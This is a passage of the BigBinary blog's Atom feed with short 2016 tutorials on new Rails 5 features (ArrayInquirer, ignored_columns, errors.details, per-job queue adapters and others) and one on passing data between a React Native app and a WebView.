(&quot;posts&quot;.&quot;id&quot; = ? OR &quot;posts&quot;.&quot;id&quot; IN (2, 3)) LIMIT ?  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 2]]=&gt; &lt;ActiveRecord::Relation [#&lt;Post id: 1, title: 'Blog', user_id: 3, published: true&gt;,#&lt;Post id: 2, title: 'Rails 5 post', user_id: 4, published: true&gt;]&gt;</code></pre><p>There is an <a href="https://github.com/rails/rails/issues/24055">issue</a> open in whichdiscussions are ongoing regarding completely stopping usage of <code>limit</code>, <code>offset</code>or <code>distinct</code> when using with <code>or</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 ArrayInquirer and checking array contents]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-introduces-active-support-array-inquirer"/>
      <updated>2016-05-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-introduces-active-support-array-inquirer</id>
      <content type="html"><![CDATA[<p>Rails 5 <a href="https://github.com/rails/rails/pull/18939">introduces Array Inquirer</a>that wraps an array object and provides friendlier methods to check for thepresence of elements that can be either a string or a symbol.</p><pre><code class="language-ruby">pets = ActiveSupport::ArrayInquirer.new([:cat, :dog, 'rabbit'])&gt; pets.cat?#=&gt; true&gt; pets.rabbit?#=&gt; true&gt; pets.elephant?#=&gt; false</code></pre><p>Array Inquirer also has <code>any?</code> method to check for the presence of any of thepassed arguments as elements in the array.</p><pre><code class="language-ruby">pets = ActiveSupport::ArrayInquirer.new([:cat, :dog, 'rabbit'])&gt; pets.any?(:cat, :dog)#=&gt; true&gt; pets.any?('cat', 'dog')#=&gt; true&gt; pets.any?(:rabbit, 'elephant')#=&gt; true&gt; pets.any?('elephant', :tiger)#=&gt; false</code></pre><p>Since <code>ArrayInquirer</code> class inherits from <code>Array</code> class, its <code>any?</code> methodperforms same as <code>any?</code> method of <code>Array</code> class when no arguments are passed.</p><pre><code class="language-ruby">pets = ActiveSupport::ArrayInquirer.new([:cat, :dog, 'rabbit'])&gt; pets.any?#=&gt; true&gt; pets.any? { |pet| pet.to_s == 'dog' }#=&gt; true</code></pre><h2>Use inquiry method on array to fetch Array Inquirer version</h2><p>For any given array we can have its Array Inquirer version by calling <code>inquiry</code>method on it.</p><pre><code class="language-ruby">pets = [:cat, :dog, 'rabbit'].inquiry&gt; pets.cat?#=&gt; true&gt; pets.rabbit?#=&gt; true&gt; pets.elephant?#=&gt; false</code></pre><h2>Usage of Array Inquirer in Rails code</h2><p>Rails 5<a href="https://github.com/georgeclaghorn/rails/blob/c64b99ecc98341d504aced72448bee758f3cfdaf/actionpack/lib/action_dispatch/http/mime_negotiation.rb#L89">makes use of Array Inquirer</a>and provides a better way of checking for the presence of given variant.</p><p>Before Rails 5 code looked like this.</p><pre><code class="language-ruby">request.variant = :phone&gt; request.variant#=&gt; [:phone]&gt; request.variant.include?(:phone)#=&gt; true&gt; request.variant.include?('phone')#=&gt; false</code></pre><p>Corresponding Rails 5 version is below.</p><pre><code class="language-ruby">request.variant = :phone&gt; request.variant.phone?#=&gt; true&gt; request.variant.tablet?#=&gt; false</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Renaming transactional fixtures to tests]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-renamed-transactional-fixtures-to-transactional-tests"/>
      <updated>2016-05-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-renamed-transactional-fixtures-to-transactional-tests</id>
      <content type="html"><![CDATA[<p>In Rails 4.x we have transactional fixtures that wrap each test in a databasetransaction. This transaction rollbacks all the changes at the end of the test.It means the state of the database, before the test is same as after the test isdone.</p><p>By default this functionality is enabled. We can choose to disable it in a testcase class by setting the class attribute <code>use_transactional_fixtures</code> to<code>false</code></p><pre><code class="language-ruby">class FooTest &lt; ActiveSupport::TestCase  self.use_transactional_fixtures = falseend</code></pre><p>Rails also comes with fixtures for tests. So it may seem that<code>use_transactional_fixtures</code> has something to do with the Rails fixtures. A lotof people don't use fixtures and they think that they should disable<code>use_transactional_fixtures</code> because they do not use fixtures.</p><p>To overcome this confusion, Rails 5 has<a href="https://github.com/rails/rails/pull/19282">renamed transactional fixtures to transactional tests</a>making it clear that it has nothing to do with the fixtures used in tests.</p><p>In Rails 5, the above example will be written as follows.</p><pre><code class="language-ruby">class FooTest &lt; ActiveSupport::TestCase  self.use_transactional_tests = falseend</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Data exchange between React Native app and WebView]]></title>
       <author><name>Bilal Budhani</name></author>
      <link href="https://www.bigbinary.com/blog/send-receive-data-between-react-native-and-webview"/>
      <updated>2016-05-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/send-receive-data-between-react-native-and-webview</id>
      <content type="html"><![CDATA[<p>A project we recently worked on needed some complicated charts.We builtthose charts using JavaScript library and it worked fine on browsers.</p><p>Now we need to build mobile app using<a href="https://facebook.github.io/react-native/">React Native</a>and it would take alot of time to build those charts natively. So we decided to useWebView (Link is not available )to render the html pages which already displays charts nicely.</p><p>React Native comes with <code>WebView</code>component by default.So rendering the html page using <code>WebView</code> was easy.However, once the page is rendered the React Native app could not exchangeany data with the web page.</p><p>In this blog post we'll discuss how tomake React Native app communicate with the pages rendered using<code>WebView</code>with the help of<a href="https://github.com/alinz/react-native-webview-bridge">react-native-webview-bridge</a>library.</p><h2>What is React Native WebView Bridge ?</h2><p><code>react-native-webview-bridge</code>isa wrapper on top of React Native's <code>WebView</code> component with some extra features.</p><p>First we need to install<a href="https://github.com/alinz/react-native-webview-bridge">react-native-webview-bridge</a>package.</p><pre><code class="language-javascript">npm install react-native-webview-bridge --save</code></pre><p>Next we need to import the <code>WebView</code> bridge module.</p><pre><code class="language-javascript">// ES6import WebViewBridge from &quot;react-native-webview-bridge&quot;;// ES5let WebViewBridge = require(&quot;react-native-webview-bridge&quot;);</code></pre><p>Now let's create a basic React component.This component will be responsible for rendering html page using<code>WebView</code>.</p><pre><code class="language-javascript">React.createClass({  render: function () {    return (      &lt;WebViewBridge        ref=&quot;webviewbridge&quot;        onBridgeMessage={this.onBridgeMessage.bind(this)}        source={{ uri: &quot;https://www.example.com/charts&quot; }}      /&gt;    );  },});</code></pre><p>After the component is mounted then we will send data to web view.</p><pre><code class="language-javascript">componentDidMount() {  let chartData = {data: '...'};  // Send this chart data over to web view after 5 seconds.  setTimeout(() =&gt; {    this.refs.webviewbridge.sendToBridge(JSON.stringify(data));  }, 5000);},</code></pre><p>Next, We will add code to receive data from web view.</p><pre><code class="language-javascript">onBridgeMessage: function (webViewData) {  let jsonData = JSON.parse(webViewData);  if (jsonData.success) {    Alert.alert(jsonData.message);  }  console.log('data received', webViewData, jsonData);  //.. do some react native stuff when data is received}</code></pre><p>At this time code should look something like this.</p><pre><code class="language-javascript">React.createClass({  componentDidMount() {    let chartData = { data: &quot;...&quot; };    // Send this chart data over to web view after 5 seconds.    setTimeout(() =&gt; {      this.refs.webviewbridge.sendToBridge(JSON.stringify(data));    }, 5000);  },  render: function () {    return (      &lt;WebViewBridge        ref=&quot;webviewbridge&quot;        onBridgeMessage={this.onBridgeMessage.bind(this)}        source={{          uri: &quot;https://www.example.com/charts&quot;,        }}      /&gt;    );  },  onBridgeMessage: function (webViewData) {    let jsonData = JSON.parse(webViewData);    if (jsonData.success) {      Alert.alert(jsonData.message);    }    console.log(&quot;data received&quot;, webViewData, jsonData);    //.. do some react native stuff when data is received  },});</code></pre><p>Okay, We've added all the React Native side of code.We now need to add some JavaScript code on our web page to complete the functionality.</p><h2>Why do we need to add JavaScript snippet on my web page?</h2><p>This is a two way data exchange scenario. When our React Native app sends any data, this JavaScript snippet will parse that data and will trigger functions accordingly. We'll also be able to send some data back to React Native app from JavaScript.</p><p>The<a href="https://github.com/alinz/react-native-webview-bridge#simple-example">example in the README</a>of WebViewBridge library shows how to inject JavaScript snippet in React component.However, we prefer JavaScript code to be added to web page directlysince it provides more control and flexibility.</p><p>Coming back to our implementation, Let's now add the snippet in our web page.</p><pre><code class="language-javascript">&lt;script&gt; (function () {    if (WebViewBridge) {      // This function gets triggered when data received from React Native app.      WebViewBridge.onMessage = function (reactNativeData) {        // Converts the payload in JSON format.        var jsonData = JSON.parse(reactNativeData);        // Passes data to charts for rendering        renderChart(jsonData.data);        // Data to send from web view to React Native app.        var dataToSend = JSON.stringify({success: true, message: 'Data received'});        // Keep calm and send the data.        WebViewBridge.send(dataToSend);      };    }  }())&lt;/script&gt;</code></pre><p>Done! We've achieved our goal of having a two way communication channel between our React Native app and the web page.</p><p>Checkout<a href="https://github.com/alinz/react-native-webview-bridge/tree/master/examples/SampleRN20">this link</a>for more examples of how to use WebView Bridge.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds ignored_columns for Active Record]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-active-record-ignored-columns"/>
      <updated>2016-05-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-active-record-ignored-columns</id>
      <content type="html"><![CDATA[<p>Sometimes we need to ignore a database column. However Rails 4.x doesn't haveany officially defined method which ignores a database column from ActiveRecord. We can apply our patch on model to ignore certain columns.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  # Ignoring employee_email column  def self.columns    super.reject {|column| column.name == 'employee_email'}  endend</code></pre><h3>Rails 5 added ignored_columns</h3><p>Rails 5 <a href="https://github.com/rails/rails/pull/21720">has added ignored_columns</a>to <code>ActiveRecord::Base</code> class.</p><p>Here is revised code after using <code>ignored_columns</code> method.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  self.ignored_columns = %w(employee_email)end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds a hidden field on collection radio buttons]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-add-a-hidden-field-on-collection-radio-buttons"/>
      <updated>2016-05-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-add-a-hidden-field-on-collection-radio-buttons</id>
      <content type="html"><![CDATA[<p>Consider the following form which has only one input <code>role_id</code> which is acceptedthrough <code>collection_radio_button</code>.</p><pre><code class="language-ruby">&lt;%= form_for(@user) do |f| %&gt;  &lt;%= f.collection_radio_buttons :role_id, @roles, :id, :name %&gt;  &lt;div class=&quot;actions&quot;&gt;    &lt;%= f.submit %&gt;  &lt;/div&gt;&lt;% end %&gt;</code></pre><p>In the controller, we can access <code>role_id</code> using the strong parameters.</p><pre><code class="language-ruby">def user_params  params.require(:user).permit(:role_id)end</code></pre><p>When we try to submit this form without selecting any radio button in Rails 4.x,we will get <code>400 Bad Request</code> error with following message.</p><pre><code class="language-ruby">ActionController::ParameterMissing (param is missing or the value is empty: user):.</code></pre><p>This is because following parameters were sent to server in Rails 4.x .</p><pre><code class="language-ruby">Parameters: {&quot;utf8&quot;=&gt;&quot;&quot;, &quot;authenticity_token&quot;=&gt;&quot;...&quot;, &quot;commit&quot;=&gt;&quot;Create User&quot;}</code></pre><p>According to HTML specification, when multiple parameters are passed to<code>collection_radio_buttons</code> and no option is selected, web browsers do not sendany value to the server.</p><h2>Solution in Rails 5</h2><p>Rails 5<a href="https://github.com/rails/rails/pull/18303">adds hidden field on the collection_radio_buttons</a>to avoid raising an error when the only input on the form is<code>collection_radio_buttons</code>. The hidden field has the same name as collectionradio button and has blank value.</p><p>Following parameters will be sent to server in Rails 5 when above user form issubmitted:</p><pre><code class="language-ruby">Parameters: {&quot;utf8&quot;=&gt;&quot;&quot;, &quot;authenticity_token&quot;=&gt;&quot;...&quot;, &quot;user&quot;=&gt;{&quot;role_id&quot;=&gt;&quot;&quot;}, &quot;commit&quot;=&gt;&quot;Create User&quot;}</code></pre><p>In case we don't want the helper to generate this hidden field, we can specify<code>include_hidden: false</code>.</p><pre><code class="language-ruby">&lt;%= f.collection_radio_buttons :role_id, Role.all, :id, :name, include_hidden: false %&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Attributes from Active Record to Active Model]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-moved-assign-attributes-from-activerecord-to-activemodel"/>
      <updated>2016-05-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-moved-assign-attributes-from-activerecord-to-activemodel</id>
      <content type="html"><![CDATA[<p>Before Rails 5, we could use <code>assign_attributes</code> and have bulk assignment ofattributes only for objects whose classes are inherited from<code>ActiveRecord::Base</code> class.</p><p>In Rails 5 we can make use of <code>assign_attributes</code> method and have bulkassignment of attributes even for objects whose classes are not inherited from<code>ActiveRecord::Base</code>.</p><p>This is possible because the attributes assignment code<a href="https://github.com/rails/rails/pull/10776">is now moved</a> from<code>ActiveRecord::AttributeAssignment</code> to <code>ActiveModel::AttributeAssignment</code>module.</p><p>To have this up and running, we need to include<code>ActiveModel::AttributeAssignment</code> module to our class.</p><pre><code class="language-ruby">class User  include ActiveModel::AttributeAssignment  attr_accessor :email, :first_name, :last_nameenduser = User.newuser.assign_attributes({email:      'sam@example.com',                        first_name: 'Sam',                        last_name:  'Smith'})&gt; user.email#=&gt; &quot;sam@example.com&quot;&gt; user.first_name#=&gt; &quot;Sam&quot;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Configure Active Job backend adapter for jobs]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-to-inherit-activejob-queue-adapter"/>
      <updated>2016-05-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-to-inherit-activejob-queue-adapter</id>
      <content type="html"><![CDATA[<p>Before Rails 5 we had ability to configure Active Job <code>queue_adapter</code> at anapplication level. If we want to use <code>sidekiq</code> as our backend queue adapter wewould configure it as following.</p><pre><code class="language-ruby">config.active_job.queue_adapter = :sidekiq</code></pre><p>This <code>queue_adapter</code> would be applicable to all jobs.</p><p>Rails 5 provides ability to configure <code>queue_adapter</code><a href="https://github.com/rails/rails/pull/16992">on a per job basis</a>. It means<code>queue_adapter</code> for one job can be different to that of the other job.</p><p>Let's suppose we have two jobs in our brand new Rails 5 application. <code>EmailJob</code>is responsible for processing basic emails and <code>NewsletterJob</code> sends out newsletters.</p><pre><code class="language-ruby">class EmailJob &lt; ActiveJob::Base  self.queue_adapter = :sidekiqendclass NewletterJob &lt; ActiveJob::BaseendEmailJob.queue_adapter =&gt; #&lt;ActiveJob::QueueAdapters::SidekiqAdapter:0x007fb3d0b2e4a0&gt;NewletterJob.queue_adapter =&gt; #&lt;ActiveJob::QueueAdapters::AsyncAdapter:0x007fb3d0c61b88&gt;</code></pre><p>We are now able to configure <code>sidekiq</code> queue adapter for <code>EmailJob</code>. In case of<code>NewsletterJob</code> we fallback to the global default adapter which in case of a newRails 5 app <a href="rails-5-changed-default-active-job-adapter-to-async">is async</a>.</p><p>Moreover, in Rails 5, when one job inherits other job, then queue adapter of theparent job gets persisted in the child job unless child job has configuration tochange queue adapter.</p><p>Since news letters are email jobs we can make <code>NewsLetterJob</code> inherit from<code>EmailJob</code>.</p><p>Below is an example where <code>EmailJob</code> is using <code>rescue</code> while <code>NewsLetterJob</code> isusing <code>sidekiq</code>.</p><pre><code class="language-ruby">class EmailJob &lt; ActiveJob::Base  self.queue_adapter = :resqueendclass NewsletterJob &lt; EmailJobendEmailJob.queue_adapter =&gt; #&lt;ActiveJob::QueueAdapters::ResqueAdapter:0x007fe137ede2a0&gt;NewsletterJob.queue_adapter =&gt; #&lt;ActiveJob::QueueAdapters::ResqueAdapter:0x007fe137ede2a0&gt;class NewsletterJob &lt; EmailJob  self.queue_adapter = :sidekiqendNewsletterJob.queue_adapter =&gt; #&lt;ActiveJob::QueueAdapters::SidekiqAdapter:0x007fb3d0b2e4a0&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 accepts 1 or true for acceptance validation]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-accepts-1-or-true-for-acceptance-validation"/>
      <updated>2016-05-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-accepts-1-or-true-for-acceptance-validation</id>
      <content type="html"><![CDATA[<p><code>validates_acceptance_of</code> is a good validation tool for asking users to accept&quot;terms of service&quot; or similar items.</p><p>Before Rails 5, the only acceptable value for a <code>validates_acceptance_of</code>validation was <code>1</code>.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  validates_acceptance_of :terms_of_serviceend&gt; user = User.new(terms_of_service: &quot;1&quot;)&gt; user.valid?#=&gt; true</code></pre><p>Having acceptable value of <code>1</code> does cause some ambiguity because general purposeof acceptance validation is for attributes that hold boolean values.</p><p>So in order to have <code>true</code> as acceptance value we had to pass <code>accept</code> option to<code>validates_acceptance_of</code> as shown below.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  validates_acceptance_of :terms_of_service, accept: trueend&gt; user = User.new(terms_of_service: true)&gt; user.valid?#=&gt; true&gt; user.terms_of_service = '1'&gt; user.valid?#=&gt; false</code></pre><p>Now this comes with the cost that <code>1</code> is no longer an acceptable value.</p><p>In Rails 5, we have <code>true</code> as a<a href="https://github.com/rails/rails/pull/18439">default value for acceptance</a> alongwith the already existing acceptable value of <code>1</code>.</p><p>In Rails 5 the previous example would look like as shown below.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  validates_acceptance_of :terms_of_serviceend&gt; user = User.new(terms_of_service: true)&gt; user.valid?#=&gt; true&gt; user.terms_of_service = '1'&gt; user.valid?#=&gt; true</code></pre><h2>Rails 5 allows user to have custom set of acceptable values</h2><p>In Rails 5, <code>:accept</code> option of <code>validates_acceptance_of</code> method supports anarray of values unlike a single value that we had before.</p><p>So in our example if we are to validate our <code>terms_of_service</code> attribute withany of <code>true</code>, <code>&quot;y&quot;</code>, <code>&quot;yes&quot;</code> we could have our validation as follows.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  validates_acceptance_of :terms_of_service, accept: [true, &quot;y&quot;, &quot;yes&quot;]end&gt; user = User.new(terms_of_service: true)&gt; user.valid?#=&gt; true&gt; user.terms_of_service = 'y'&gt; user.valid?#=&gt; true&gt; user.terms_of_service = 'yes'&gt; user.valid?#=&gt; true</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 supports bi-directional destroy dependency]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/Rails-5-supports-bi-directional-destroy-dependency"/>
      <updated>2016-05-12T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/Rails-5-supports-bi-directional-destroy-dependency</id>
      <content type="html"><![CDATA[<p>In Rails 4.x, it is not possible to have destroy dependency on both sides of abi-directional association between the two models as it would result in aninfinite callback loop causing <code>SystemStackError: stack level too deep</code>.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  has_one :profile, dependent: :destroyendclass Profile &lt; ActiveRecord::Base  belongs_to :user, dependent: :destroyend</code></pre><p>Calling <code>User#destroy</code> or <code>Profile#destroy</code> would lead to an infinite callbackloop.</p><pre><code class="language-ruby">&gt;&gt; user = User.first=&gt; &lt;User id: 4, name: &quot;George&quot;&gt;&gt;&gt; user.profile=&gt; &lt;Profile id: 4&gt;&gt;&gt; user.destroy=&gt; DELETE FROM `profiles` WHERE `profiles`.`id` = 4   ROLLBACKSystemStackError: stack level too deep</code></pre><p>Rails 5<a href="https://github.com/rails/rails/pull/18548">supports bi-directional destroy dependency</a>without triggering infinite callback loop.</p><pre><code class="language-ruby">&gt;&gt; user = User.first=&gt; &lt;User id: 4, name: &quot;George&quot;&gt;&gt;&gt; user.profile=&gt; &lt;Profile id: 4, about: 'Rails developer', works_at: 'ABC'&gt;&gt;&gt; user.destroy=&gt; DELETE FROM &quot;profiles&quot; WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 4]]   DELETE FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 4]]=&gt; &lt;User id: 4, name: &quot;George&quot;&gt;</code></pre><p>There are many instances like above where we need to destroy an association whenit is destroying itself, otherwise it may lead to orphan records.</p><p>This feature adds responsibility on developers to ensure adding destroydependency only when it is required as it can have unintended consequences asshown below.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  has_many :posts, dependent: :destroyendclass Post &lt; ApplicationRecord  belongs_to :user, dependent: :destroyend&gt;&gt; user = User.first=&gt; &lt;User id: 4, name: &quot;George&quot;&gt;&gt;&gt; user.posts=&gt; &lt;ActiveRecord::Associations::CollectionProxy [&lt;Post id: 11, title: 'Ruby', user_id: 4&gt;, #&lt;Post id: 12, title: 'Rails', user_id: 4&gt;]&gt;</code></pre><p>As we can see &quot;user&quot; has two posts. Now we will destroy first post.</p><pre><code class="language-ruby">&gt;&gt; user.posts.first.destroy=&gt; DELETE FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 11]]   SELECT &quot;posts&quot;.* FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;user_id&quot; = ?  [[&quot;user_id&quot;, 4]]   DELETE FROM &quot;posts&quot; WHERE &quot;posts&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 12]]   DELETE FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;id&quot;, 4]]</code></pre><p>As we can see, we wanted to remove post with id &quot;11&quot;. However post with id &quot;12&quot;also got deleted. Not only that but user record got deleted too.</p><p>In Rails 4.x this would have resulted in<code>SystemStackError: stack level too deep</code> .</p><p>So we should use this option very carefully.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 adds after_commit callbacks aliases]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-after_create-aliases"/>
      <updated>2016-05-11T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-after_create-aliases</id>
      <content type="html"><![CDATA[<p>Rails 4.x has<a href="http://guides.rubyonrails.org/active_record_callbacks.html">after_commit</a>callback. <code>after_commit</code> is called after a record has been created, updated ordestroyed.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  after_commit :send_welcome_mail, on: create  after_commit :send_profile_update_notification, on: update  after_commit :remove_profile_data, on: destroy  def send_welcome_mail    EmailSender.send_welcome_mail(email: email)  endend</code></pre><h2>Rails 5 added new aliases</h2><p>Rails 5 <a href="https://github.com/rails/rails/pull/22516">had added</a> following threealiases.</p><ul><li>after_create_commit</li><li>after_update_commit</li><li>after_destroy_commit</li></ul><p>Here is revised code after using these aliases.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  after_create_commit:send_welcome_mail  after_update_commit:send_profile_update_notification  after_destroy_commit:remove_profile_data  def send_welcome_mail    EmailSender.send_welcome_mail(email: email)  endend</code></pre><h3>Note</h3><p>We earlier stated that <code>after_commit</code> callback is executed at the end oftransaction. Using <code>after_commit</code> with a transaction block can be tricky. Pleasecheckout our earlier post about<a href="gotcha-with-after_commit-callback-in-rails">Gotcha with after_commit callback in Rails</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Updating a record without updating timestamps]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-updating-without-updating-timestamps"/>
      <updated>2016-05-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-updating-without-updating-timestamps</id>
      <content type="html"><![CDATA[<p>In Rails 4.x, when we save an <code>ActiveRecord</code> object then Rails automaticallyupdates fields <code>updated_at</code> or <code>updated_on</code>.</p><pre><code class="language-ruby">&gt;&gt; user = User.new(name: 'John', email: 'john@example.com')&gt;&gt; user.save INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;, &quot;email&quot;) VALUES (?, ?, ?, ?)  [[&quot;name&quot;, &quot;John&quot;], [&quot;created_at&quot;, 2016-03-16 09:12:44 UTC], [&quot;updated_at&quot;, 2016-03-16 09:12:44 UTC], [&quot;email&quot;, &quot;john@example.com&quot;]]=&gt; true&gt;&gt; user.updated_at=&gt; Wed, 16 Mar 2016 09:12:44 UTC +00:00&gt;&gt; user.name = &quot;Mark&quot;&gt;&gt; user.save  UPDATE &quot;users&quot; SET &quot;name&quot; = ?, &quot;updated_at&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;name&quot;, &quot;Mark&quot;], [&quot;updated_at&quot;, 2016-03-16 09:15:30 UTC], [&quot;id&quot;, 12]]=&gt; true&gt;&gt; user.updated_at=&gt; Wed, 16 Mar 2016 09:15:30 UTC +00:00</code></pre><h2>Addition of touch option in ActiveRecord::Base#save</h2><p>In Rails 5, by passing <code>touch: false</code> as an option to <code>save</code>, we can update theobject without updating timestamps. The default option for <code>touch</code> is <code>true</code>.</p><pre><code class="language-ruby">&gt;&gt; user.updated_at=&gt; Wed, 16 Mar 2016 09:15:30 UTC +00:00&gt;&gt; user.name = &quot;Dan&quot;&gt;&gt; user.save(touch: false)  UPDATE &quot;users&quot; SET &quot;name&quot; = ? WHERE &quot;users&quot;.&quot;id&quot; = ?  [[&quot;name&quot;, &quot;Dan&quot;], [&quot;id&quot;, 12]]=&gt; true&gt;&gt; user.updated_at=&gt; Wed, 16 Mar 2016 09:15:30 UTC +00:00</code></pre><p>This works only when we are updating a record and does not work when a record iscreated.</p><pre><code class="language-ruby">&gt;&gt; user = User.new(name: 'Tom', email: 'tom@example.com')&gt;&gt; user.save(touch: false) INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;, &quot;email&quot;) VALUES (?, ?, ?, ?)  [[&quot;name&quot;, &quot;Tom&quot;], [&quot;created_at&quot;, 2016-03-21 06:57:23 UTC], [&quot;updated_at&quot;, 2016-03-21 06:57:23 UTC], [&quot;email&quot;, &quot;tom@example.com&quot;]])&gt;&gt; user.updated_at=&gt; Mon, 21 Mar 2016 07:04:04 UTC +00:00</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Retrieving info of failed validations]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-a-way-to-get-information-about-types-of-failed-validations"/>
      <updated>2016-05-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-a-way-to-get-information-about-types-of-failed-validations</id>
      <content type="html"><![CDATA[<p>Let's look at a validation example in Rails 4.x.</p><pre><code class="language-ruby">class User &lt; ActiveRecord::Base  validates :email, presence: trueend&gt;&gt; user = User.new&gt;&gt; user.valid?=&gt; false&gt;&gt; user.errors.messages=&gt; {:email=&gt;[&quot;can't be blank&quot;]}</code></pre><p>In this case, we do not get any information about the type of failed validationas <code>ActiveModel#Errors</code> only gives the attribute name and the translated errormessage.</p><p>This works out well for normal apps. But in case of API only applications,sometimes we want to allow the client consuming the API to generate customizederror message as per their needs. We don't want to send the final translatedmessages in such cases. Instead if we could just send details that <code>presence</code>validation failed for <code>:name</code> attribute, the client app would be able tocustomize the error message based on that information.</p><p>In Rails 5, it is now possible to get such details about which validationsfailed for a given attribute.</p><p>We can check this by calling<a href="https://github.com/rails/rails/pull/18322">details method</a> on the<code>ActiveModel#Errors</code> instance.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  validates :email, presence: trueend&gt;&gt; user = User.new&gt;&gt; user.valid?=&gt; false&gt;&gt; user.errors.details=&gt; {:email=&gt;[{:error=&gt;:blank}]}</code></pre><p>We can also add custom validator types as per our need.</p><pre><code class="language-ruby"># Custom validator type&gt;&gt; user = User.new&gt;&gt; user.errors.add(:name, :not_valid, message: &quot;The name appears invalid&quot;)&gt;&gt; user.errors.details=&gt; {:name=&gt;[{:error=&gt;:not_valid}]}# Custom error with default validator type :invalid&gt;&gt; user = User.new&gt;&gt; user.errors.add(:name)&gt;&gt; user.errors.details=&gt; {:name=&gt;[{:error=&gt;:invalid}]}# More than one error on one attribute&gt;&gt; user = User.new&gt;&gt; user.errors.add(:password, :invalid_format, message: &quot;Password must start with an alphabet&quot;)&gt;&gt; user.errors.add(:password, :invalid_length, message: &quot;Password must have at least 8 characters&quot;)&gt;&gt; user.errors.details=&gt; {:password=&gt;[{:error=&gt;:invalid_format}, {:error=&gt;:invalid_length}]}</code></pre><h2>Passing contextual information about the errors</h2><p>We can also send contextual data for the validation to the <code>Errors#add</code> method.This data can be later accessed via <code>Errors#details</code> method because <code>Errors#add</code>method forwards all options except <code>:message</code>, <code>:if</code>, <code>:unless</code>, and <code>:on</code> to<code>details</code>.</p><p>For eg. we can say that the <code>password</code> is invalid because <code>!</code> is not allowed, asfollows.</p><pre><code class="language-ruby">class User &lt; ApplicationRecord  validate :password_cannot_have_invalid_character  def password_cannot_have_invalid_character    if password.scan(&quot;!&quot;).present?      errors.add(:password, :invalid_character, not_allowed: &quot;!&quot;)    end  endend&gt;&gt; user = User.create(name: 'Mark', password: 'Ra!ls')&gt;&gt; user.errors.details=&gt; {:password=&gt;[{:error=&gt;:invalid_character, :not_allowed=&gt;&quot;!&quot;}]}</code></pre><p>We can also use this feature in our Rails 4.x apps by simply installing gem<a href="https://github.com/cowbell/active_model-errors_details">active_model-errors_details</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using Image as a Container in React Native]]></title>
       <author><name>Bilal Budhani</name></author>
      <link href="https://www.bigbinary.com/blog/using-image-as-a-container-in-react-native"/>
      <updated>2016-04-28T12:00:00+00:00</updated>
